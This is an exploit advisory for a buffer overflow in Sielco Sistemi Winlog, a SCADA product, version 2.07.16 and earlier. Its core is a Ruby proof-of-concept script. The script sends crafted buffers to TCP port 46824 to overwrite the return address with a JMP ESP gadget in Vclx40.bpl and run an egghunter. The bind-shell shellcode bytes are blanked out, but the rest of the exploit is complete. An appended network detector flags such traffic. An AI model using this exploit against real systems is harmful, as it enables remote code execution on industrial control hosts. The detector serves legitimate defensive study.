Sielco Sistemi Winlog Buffer Overflow Vulnerability

Summary

Sielco Sistemi Winlog suffers from a buffer overflow vulnerability in the service listening on TCP port 46824: an oversized message overwrites the saved return address, and the proof of concept below reaches code execution through a JMP ESP in Vclx40.bpl and an egghunter.

Credit:

Details

Vulnerable Systems:
 * Sielco Sistemi Winlog version 2.07.16 and prior

require 'socket'

port = 46824
host = '10.8.28.37'

s = TCPSocket.open(host, port)

sleep(0.5)

# Egghunter: scans memory for the 'woot' tag and jumps to the bytes that follow it
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter << "\xef\xb8\x77\x6f\x6f\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# The 368 encoded payload bytes that followed in the original listing are omitted here.
shellcode = "" # placeholder for the omitted payload bytes

puts 'placing the shellcode'
buffer = "\x41" * 2000
buffer << 'wootwoot' # egg tag the egghunter searches for
buffer << "\x90"
buffer << shellcode
buffer << "\x90" * 2000
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)

puts 'sleeping ...'
sleep(5)

puts 'kicking ...'
# 20 + 10 + 167 = 197 bytes of padding before the saved return address
buffer = "\x41" * 20 + "\x14" * 10 + "\x41" * 167
buffer << "\xdf\x53\x51\x40" # EIP -> Jmp ESP - Vclx40.bpl - 0x405153df
buffer << "\x90"
buffer << egghunter
buffer << "\x90" * (59 - egghunter.length)
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)
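The offsets in the proof of concept (197 bytes of padding before the return address on port 46824) can be turned into a simple network-side check. The following detector is an added example written for this page, not part of the advisory; the filler-run threshold and the sample traffic are constructed assumptions.

```ruby
# Flags messages to the Winlog service that look like the overflow described above.
WINLOG_PORT = 46824
# Padding before the saved return address in the proof of concept: 20 + 10 + 167 bytes.
EIP_OFFSET = 20 + 10 + 167
# Constructed threshold: a legitimate message is assumed not to repeat one byte this often.
FILLER_RUN_THRESHOLD = 64

# Length of the longest run of one identical byte in the payload (catches \x41 / \x90 filler).
def longest_byte_run(payload)
  best = 0
  run = 0
  prev = nil
  payload.each_byte do |b|
    run = (b == prev) ? run + 1 : 1
    prev = b
    best = run if run > best
  end
  best
end

# Returns a list of reasons the message is suspicious; empty when nothing was flagged.
def classify_message(dst_port, payload)
  reasons = []
  return reasons unless dst_port == WINLOG_PORT

  if payload.bytesize > EIP_OFFSET
    reasons << "length #{payload.bytesize} exceeds return-address offset #{EIP_OFFSET}"
  end
  run = longest_byte_run(payload)
  reasons << "filler run of #{run} identical bytes" if run >= FILLER_RUN_THRESHOLD
  reasons
end

# Constructed sample traffic: a short benign message, a crafted one, and a large message to another port.
SAMPLES = [
  [46824, "STATUS?\r\n"],
  [46824, "A" * 197 + "\xdf\x53\x51\x40".b + "\x90".b * 60],
  [8080, "A" * 4000]
]

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each do |port, payload|
    reasons = classify_message(port, payload)
    puts "port #{port}, #{payload.bytesize} bytes: #{reasons.empty? ? 'ok' : reasons.join('; ')}"
  end
end
```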

Disclosure Timeline:
Published: 2012-06-05

Categories: Exploits